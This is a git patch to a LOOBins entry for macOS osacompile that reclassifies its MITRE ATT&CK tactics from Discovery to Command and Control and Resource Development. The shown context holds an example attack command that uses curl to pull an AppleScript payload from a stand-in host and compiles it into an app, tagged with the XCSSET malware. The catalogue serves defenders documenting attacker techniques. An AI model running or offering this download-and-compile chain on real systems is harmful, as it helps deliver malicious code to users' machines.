From 206762c28a124f71f426ce7ad97edbb777c0e466 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=C3=89milio=20Gonzalez?= Date: Mon, 4 Dec 2023 17:29:45 -0500 Subject: [PATCH] Change tactics in osacompile According to the use cases, the command and control (ingress tool transfer) and Resource Development tactics are more appropriate. Thoughts? --- LOOBins/osacompile.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/LOOBins/osacompile.yml b/LOOBins/osacompile.yml index 9ce3d49..896a3e2 100644 --- a/LOOBins/osacompile.yml +++ b/LOOBins/osacompile.yml @@ -8,7 +8,8 @@ example_use_cases: description: The following command downloads an applescript payload from getpayload.com and compiles it into an app. code: curl https://getpayload.com/payload_code.apple_script && osacompile -x -e payload_code.apple_script -o payload.app tactics: - - Discovery + - Command and Control + - Resource Development tags: - XCSSET paths: